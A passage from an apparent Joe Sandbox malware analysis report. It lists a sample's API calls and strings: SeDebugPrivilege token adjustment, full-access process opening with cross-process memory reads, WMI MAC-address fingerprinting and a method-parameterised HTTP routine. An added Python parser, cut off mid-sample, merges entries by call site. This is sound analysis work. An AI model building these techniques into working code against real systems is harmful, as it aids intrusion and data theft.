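Run on the sample lines, the rules flag the executable allocation at 0040A6B7, the impersonation-level COM initialisation at 00403B2F, the PROCESS_ALL_ACCESS handle at 0041BE70, the cross-process read at 0041BFDF and the named section TX_SSO_SHARE_INFO_0 at 00401476, and the GUID lookup names the CoCreateInstance pair as CLSID_WbemLocator and IID_IWbemLocator. Joe Sandbox prints more slots than some APIs take (VirtualAlloc has four parameters but six values are listed), which is why the rules only read leading positions; adding a rule means adding one `elif` with the SDK constant it checks.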

                                                                Control-flow Graph: function 0x41bb94 (basic blocks 0x41bb94 through 0x41c128). Calls on the graph: GetCurrentProcess, OpenProcess, VirtualQueryEx, ReadProcessMemory, CloseHandle; internal subcalls 0x40106d, 0x401143, 0x40288d, 0x404a96, 0x41c12b, 0x41c35b, 0x41c443, 0x41c5bd, 0x42b310, 0x42b8f0, 0x42bc10, 0x42c3f0, with error paths through 0x429a56 and 0x429a74. The rendered graph (executed / not-executed block colouring and the edge list) is omitted.
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 0041BE32
                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF,00000000), ref: 0041BE70
                                                                • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 0041BEAA
                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041BFDF
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C0A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentHandleMemoryOpenQueryReadVirtual
                                                                • String ID: 00401000
                                                                • API String ID: 1734214874-3810895984
                                                                • Opcode ID: 89b7798e4d126fc2be03ee519c788b394e23d583054547b111b31f2967c17c2e
                                                                • Instruction ID: 7221e9babcb3d1ad18ca84cc77c3eaae3ce004eee12675bafef9ee27e0268a03
                                                                • Opcode Fuzzy Hash: 89b7798e4d126fc2be03ee519c788b394e23d583054547b111b31f2967c17c2e
                                                                • Instruction Fuzzy Hash: CFF14FB1E40319EBDB10DF95ECC2BDEBBB4EB08314F14106AF604B6282D7799954CB69

                                                                Control-flow Graph
                                                                control_flow_graph 2093 439a44-439af2 call 4c9625 * 3 GetCurrentProcess 2100 439af4-439b08 call 4c9631 2093->2100 2101 439b0b-439b19 2093->2101 2100->2101 2103 439b24-439b44 OpenProcessToken 2101->2103 2104 439b1b-439b21 call 4c962b 2101->2104 2105 439b46-439b5a call 4c9631 2103->2105 2106 439b5d-439b78 LookupPrivilegeValueA 2103->2106 2104->2103 2105->2106 2110 439b91-439c16 AdjustTokenPrivileges 2106->2110 2111 439b7a-439b8e call 4c9631 2106->2111 2115 439c18-439c2c call 4c9631 2110->2115 2116 439c2f-439c45 CloseHandle 2110->2116 2111->2110 2115->2116 2119 439c47-439c5b call 4c9631 2116->2119 2120 439c5e-439c6c 2116->2120 2119->2120 2124 439c77-439c9f call 4c962b * 3 2120->2124 2125 439c6e-439c74 call 4c962b 2120->2125 2125->2124
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00439AE5
                                                                • OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 00439B37
                                                                • LookupPrivilegeValueA.ADVAPI32(004FEE9E,00000000,?), ref: 00439B6B
                                                                • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,0000001C,?,?), ref: 00439C09
                                                                • CloseHandle.KERNEL32(00000000), ref: 00439C38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 3038321057-2896544425
                                                                • Opcode ID: 6c725354dfadcf02d77ebe475d9dc8e379144b8da03ccbd3c0bdee5e5a10e9bf
                                                                • Instruction ID: 13e31d7d8f56efdacd22959798a99f4c5e488393b21dc980407fa0129a1cae7c
                                                                • Opcode Fuzzy Hash: 6c725354dfadcf02d77ebe475d9dc8e379144b8da03ccbd3c0bdee5e5a10e9bf
                                                                • Instruction Fuzzy Hash: 5161F9B4E00318AFDF50DF94DD86BAEBBB4BB0D304F145069E6087B286D3795914CB6A
                                                                APIs
                                                                • inet_addr.WS2_32(00000000), ref: 00402FE7
                                                                • SendARP.IPHLPAPI(00000000,00000000,?,?), ref: 00403201
                                                                Strings
                                                                • Select MACAddress From Win32_NetworkAdapter WHERE PNPDeviceID LIKE "%PCI%" AND NetConnectionStatus =2, xrefs: 00402E57
                                                                • MACAddress, xrefs: 00402E4B, 00402F1E
                                                                • Select MACAddress From Win32_NetworkAdapter WHERE NetConnectionStatus =2, xrefs: 00402F2A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sendinet_addr
                                                                • String ID: MACAddress$Select MACAddress From Win32_NetworkAdapter WHERE NetConnectionStatus =2$Select MACAddress From Win32_NetworkAdapter WHERE PNPDeviceID LIKE "%PCI%" AND NetConnectionStatus =2
                                                                • API String ID: 1684710337-4119221060
                                                                • Opcode ID: 8967e641e95b63abcf51c747ba5ab9ffcf1345ed0664bd1507683f337bcd5778
                                                                • Instruction ID: 8cdf8df996095d76e8d081fefd50f81c6dce7c45d1df1d9a4f9be6c8c8d7e727
                                                                • Opcode Fuzzy Hash: 8967e641e95b63abcf51c747ba5ab9ffcf1345ed0664bd1507683f337bcd5778
                                                                • Instruction Fuzzy Hash: 0642B8F1F403556BEB10DF95ECC2B9E77A8AB18715F14003AF605BA3C2E6795E008769

                                                                Control-flow Graph
                                                                control_flow_graph 2439 403765-4037f3 call 429a5c call 403a0c 2444 4037f5-4037fb call 429a56 2439->2444 2445 4037fe-403808 2439->2445 2444->2445 2447 4039a9-403a09 call 429a5c call 42abe0 call 42ac10 call 429a56 2445->2447 2448 40380e-403827 call 40480f 2445->2448 2455 403832-403891 call 40480f call 42b8d0 call 4048f4 2448->2455 2456 403829-40382f call 429a56 2448->2456 2471 403897-4038b8 call 40492c 2455->2471 2472 403949-40394c call 4048bc 2455->2472 2456->2455 2477 403937-40393b 2471->2477 2478 4038be-4038fb call 40480f call 404964 call 4049b2 2471->2478 2476 403951-403964 SysFreeString 2472->2476 2479 403966-40397a call 429a74 2476->2479 2480 40397d-403990 SysFreeString 2476->2480 2477->2471 2481 403941-403944 call 4048bc 2477->2481 2493 403900-403916 SysFreeString 2478->2493 2479->2480 2480->2447 2484 403992-4039a6 call 429a74 2480->2484 2481->2472 2484->2447 2494 403918-40392c call 429a74 2493->2494 2495 40392f-403932 call 4048bc 2493->2495 2494->2495 2495->2477
                                                                APIs
                                                                  • Part of subcall function 00403A0C: CoInitialize.OLE32(00000000), ref: 00403AD9
                                                                  • Part of subcall function 00403A0C: CoInitializeSecurity.COMBASE(00000000,FFFFFFFF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00403B2F
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403909
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403957
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403983
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeString$Initialize$Security
                                                                • String ID: WQL$root\CIMV2
                                                                • API String ID: 3763729824-4205897174
                                                                • Opcode ID: 69f420f91c4b20add40de96408261167a76b045712e561134f1dafe0e0a97296
                                                                • Instruction ID: 7b297cb8266044e9293a2318d1240b3eb2c25215f18588e2f3bb484e66b04af4
                                                                • Opcode Fuzzy Hash: 69f420f91c4b20add40de96408261167a76b045712e561134f1dafe0e0a97296
                                                                • Instruction Fuzzy Hash: 706126B1D00248AFEF01AFD1DC46BEEBBB4EB08314F14507AF6047A291D7B95A54CB69

                                                                Control-flow Graph
                                                                control_flow_graph 2499 40bfd2-40c005 call 429a5c 2502 40c00b-40c00f 2499->2502 2503 40c01c 2499->2503 2502->2503 2504 40c015-40c01a 2502->2504 2505 40c021-40c023 2503->2505 2504->2505 2506 40c043-40c047 2505->2506 2507 40c029-40c03e 2505->2507 2508 40c059-40c05d 2506->2508 2509 40c04d-40c054 2506->2509 2510 40c096-40c0e6 call 401046 CreateWaitableTimerA 2507->2510 2511 40c063-40c06a 2508->2511 2512 40c06f-40c073 2508->2512 2509->2510 2518 40c0e8-40c0fc call 429a74 2510->2518 2519 40c0ff-40c12c SetWaitableTimer 2510->2519 2511->2510 2514 40c085-40c089 2512->2514 2515 40c079-40c080 2512->2515 2514->2510 2517 40c08f 2514->2517 2515->2510 2517->2510 2518->2519 2521 40c145-40c16d MsgWaitForMultipleObjects 2519->2521 2522 40c12e-40c142 call 429a74 2519->2522 2523 40c186-40c18d 2521->2523 2524 40c16f-40c183 call 429a74 2521->2524 2522->2521 2529 40c193-40c1a5 call 42c320 2523->2529 2530 40c1a7-40c1ba CloseHandle 2523->2530 2524->2523 2529->2521 2533 40c1d3-40c1ee call 429a56 2530->2533 2534 40c1bc-40c1d0 call 429a74 2530->2534 2534->2533
                                                                APIs
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0040C0D9
                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,000003E8,00000000,00000001,00000000), ref: 0040C11F
                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,FFFFFFFF,000000FF), ref: 0040C160
                                                                • CloseHandle.KERNEL32(00000000,?,000003E8,00000000,00000001,00000000), ref: 0040C1AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWait
                                                                • String ID: `
                                                                • API String ID: 1829838203-1850852036
                                                                • Opcode ID: 3a36da0c8c8cad819d9ae36d91f20f05f6bdeed0f33cd957c9cc419bddac5e05
                                                                • Instruction ID: 6156cb3b7d6a09a05b960bd2ef3d40442e85c93f57321a3f60ab6ff2be6a5970
                                                                • Opcode Fuzzy Hash: 3a36da0c8c8cad819d9ae36d91f20f05f6bdeed0f33cd957c9cc419bddac5e05
                                                                • Instruction Fuzzy Hash: E1515170E44309EBDB10DF91E9867AEBB74EB05710F108166F5053A2C1D77A8A64CFAB

                                                                Control-flow Graph
                                                                control_flow_graph 2541 40bb11-40bb87 call 429a5c * 2 CreateToolhelp32Snapshot 2546 40bba0-40bba7 2541->2546 2547 40bb89-40bb9d call 429a74 2541->2547 2549 40bbb7-40bc64 call 429a5c Process32First 2546->2549 2550 40bbad-40bbb2 2546->2550 2547->2546 2557 40bc66-40bc7a call 429a74 2549->2557 2558 40bc7d-40bcfd call 429f70 2549->2558 2552 40bfae-40bfcf call 429a56 * 2 2550->2552 2557->2558 2565 40bd0e-40bd14 2558->2565 2566 40bcff 2558->2566 2568 40bd16 2565->2568 2569 40bd1b-40bd33 call 429a56 2565->2569 2567 40bd01-40bd05 2566->2567 2570 40bd07-40bd0a 2567->2570 2571 40bd0c 2567->2571 2568->2569 2574 40bd36-40bd3a 2569->2574 2570->2567 2571->2565 2575 40bd40-40bd80 call 42a180 2574->2575 2576 40bf78-40bf8b CloseHandle 2574->2576 2582 40bd82 2575->2582 2583 40bd87-40bd96 2575->2583 2577 40bfa4-40bfa9 2576->2577 2578 40bf8d-40bfa1 call 429a74 2576->2578 2577->2552 2578->2577 2582->2583 2585 40bd98 2583->2585 2586 40bd9d-40bdb8 call 42c2c0 2583->2586 2585->2586 2589 40bdc3-40bdc7 2586->2589 2590 40bdba-40bdc0 call 429a56 2586->2590 2592 40be03-40bea1 call 429a5c Process32Next 2589->2592 2593 40bdcd-40bde0 CloseHandle 2589->2593 2590->2589 2600 40bea3-40beb7 call 429a74 2592->2600 2601 40beba-40bf3a call 429f70 2592->2601 2596 40bde2-40bdf6 call 429a74 2593->2596 2597 40bdf9-40bdfe 2593->2597 2596->2597 2597->2552 2600->2601 2607 40bf4b-40bf51 2601->2607 2608 40bf3c 2601->2608 2610 40bf53 2607->2610 2611 40bf58-40bf73 call 429a56 2607->2611 2609 40bf3e-40bf42 2608->2609 2613 40bf44-40bf47 2609->2613 2614 40bf49 2609->2614 2610->2611 2611->2574 2613->2609 2614->2607
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,?,00401377,?), ref: 0040BB7A
                                                                • Process32First.KERNEL32(000000FF,00000000), ref: 0040BC57
                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040BDD3
                                                                • Process32Next.KERNEL32(000000FF,00000000), ref: 0040BE94
                                                                • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,00401377,?), ref: 0040BF7E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 1789362936-0
                                                                • Opcode ID: 7bcb87d04fedd2bbb75db658aa9d37da5b5a53274c6ae36ada41991fc3191ba1
                                                                • Instruction ID: 90e5e60346342f46725f9dd91af34a12fa010703bb6910536cc1d05f594bb0b6
                                                                • Opcode Fuzzy Hash: 7bcb87d04fedd2bbb75db658aa9d37da5b5a53274c6ae36ada41991fc3191ba1
                                                                • Instruction Fuzzy Hash: EAE13AF1A402529BFB00CF58ECC1B99B7B1EF59324F291075E506AB381D378B960DB66
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: OPTIONS$User-Agent:$https://
                                                                • API String ID: 2038078732-700722832
                                                                • Opcode ID: a781780b6f3d3943723ff75b13416bc4d359fc5dee8e843190fff0d10933da71
                                                                • Instruction ID: 12fbd2a3691f7324e0bfd8f6be448399e0d44fa5f7b7346d465fb6d1ad47d522
                                                                • Opcode Fuzzy Hash: a781780b6f3d3943723ff75b13416bc4d359fc5dee8e843190fff0d10933da71
                                                                • Instruction Fuzzy Hash: 9D9152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: DELETE$User-Agent:$https://
                                                                • API String ID: 2038078732-3342223048
                                                                • Opcode ID: bb7a23a35aeccf47d26b7e0b7e011371251f66d920211be19b9de4749f54248d
                                                                • Instruction ID: 59ff64c4c04f40f96a2391fff09c6b647a2868e7fe2e34a4a2517ae78c3fea4b
                                                                • Opcode Fuzzy Hash: bb7a23a35aeccf47d26b7e0b7e011371251f66d920211be19b9de4749f54248d
                                                                • Instruction Fuzzy Hash: 699152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: TRACE$User-Agent:$https://
                                                                • API String ID: 2038078732-4245147444
                                                                • Opcode ID: ea856ca9ccd87fe9a574a7d844f74af0b1521052991d95727b53541b976b5cd9
                                                                • Instruction ID: 4a7cd93344103a44b17a3bec012e2025edbafedbc0db8b7e0eaab9c75be3b6b1
                                                                • Opcode Fuzzy Hash: ea856ca9ccd87fe9a574a7d844f74af0b1521052991d95727b53541b976b5cd9
                                                                • Instruction Fuzzy Hash: E09152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: POST$User-Agent:$https://
                                                                • API String ID: 2038078732-2999137650
                                                                • Opcode ID: 1d48725e9a1469911c21359308ddf85ae05c7f005b1e77a10da23d69cc2a066f
                                                                • Instruction ID: 91ad81a6f0a2ae1cbf91fc5e67c05e120568aad49599a9d4507bd0ae9d5663b6
                                                                • Opcode Fuzzy Hash: 1d48725e9a1469911c21359308ddf85ae05c7f005b1e77a10da23d69cc2a066f
                                                                • Instruction Fuzzy Hash: 089152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: HEAD$User-Agent:$https://
                                                                • API String ID: 2038078732-2298113790
                                                                • Opcode ID: 25245cbd43d1e9dd82f343c5c41bda2dbe416a47e2db094533a0ebe60a359162
                                                                • Instruction ID: 07b1c4b4c754ca4108b6a960215e03f6f28ef0c1c77e3a71b00cf8d133b3bc4a
                                                                • Opcode Fuzzy Hash: 25245cbd43d1e9dd82f343c5c41bda2dbe416a47e2db094533a0ebe60a359162
                                                                • Instruction Fuzzy Hash: D19152F1F00355ABEB10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: PUT$User-Agent:$https://
                                                                • API String ID: 2038078732-1782795204
                                                                • Opcode ID: 25dbd24db00907674965123a4ac95cd42d30cf91d27c815a3c719cab87d6637c
                                                                • Instruction ID: 2ca09188c4cc529878fb38bb36f75d3d79c0742ac98a960d08e24d58fb80322f
                                                                • Opcode Fuzzy Hash: 25dbd24db00907674965123a4ac95cd42d30cf91d27c815a3c719cab87d6637c
                                                                • Instruction Fuzzy Hash: 289152F1F00355ABEF10DE96ECC2B9E76B8AB14714F14003AFB05BA282D6799910875A
                                                                APIs
                                                                • InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
                                                                Similarity
                                                                • API ID: InternetOpen
                                                                • String ID: CONNECT$User-Agent:$https://
                                                                • API String ID: 2038078732-3179744966
                                                                • Opcode ID: 4d5147f17fc863275bdb6d77018a86dcfed8de162d4a43c42f4863c09cbc1076
                                                                • Instruction ID: 6a66c60d913851a517569f214977a5c33e7fd5abb1e550e5a8e0af8c4c432d4a
                                                                • Opcode Fuzzy Hash: 4d5147f17fc863275bdb6d77018a86dcfed8de162d4a43c42f4863c09cbc1076
                                                                • Instruction Fuzzy Hash: F99162F1F00355ABEF10DE96ECC2B9F77B8AB14714F14003AFB05BA282D6799910875A
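                                                                 The seven entries above all record the same InternetOpenA call site (ref 00404F24, identical argument vector: dwAccessType 00000001 is INTERNET_OPEN_TYPE_DIRECT, dwFlags 00000000) and differ only in the leading string constant, which is an HTTP method name. Together with the fixed "User-Agent:" and "https://" constants this reads as one request routine parameterised by method, not seven separate routines. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses "APIs" and "String ID" lines in the form printed above (the sample is copied from these entries into the script) and merges entries that share a call site, so the fixed and the variable string constants can be read off per location. The regular expressions and the assumption that an entry ends at its "String ID" line are mine, matched to the field order of this report.

```python
"""Merge Joe Sandbox function entries that share an API call site.

Added example, not part of the Joe Sandbox report or its tooling. Input is the
"APIs" lines and the "String ID" line of each entry, in the order the report
prints them (API lines first, String ID last).
"""
import re
from collections import defaultdict

# Constructed sample: the relevant lines of the seven InternetOpen entries and
# of the GetProcessHeap/RtlAllocateHeap/MessageBoxA entry, copied from the report.
SAMPLE = """\
• InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
• String ID: OPTIONS$User-Agent:$https://
• InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
• String ID: DELETE$User-Agent:$https://
• InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
• String ID: TRACE$User-Agent:$https://
• InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
• String ID: POST$User-Agent:$https://
• InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
• String ID: HEAD$User-Agent:$https://
• InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
• String ID: PUT$User-Agent:$https://
• InternetOpenA.WININET(?,00000001,?,000000FF,00000000), ref: 00404F24
• String ID: CONNECT$User-Agent:$https://
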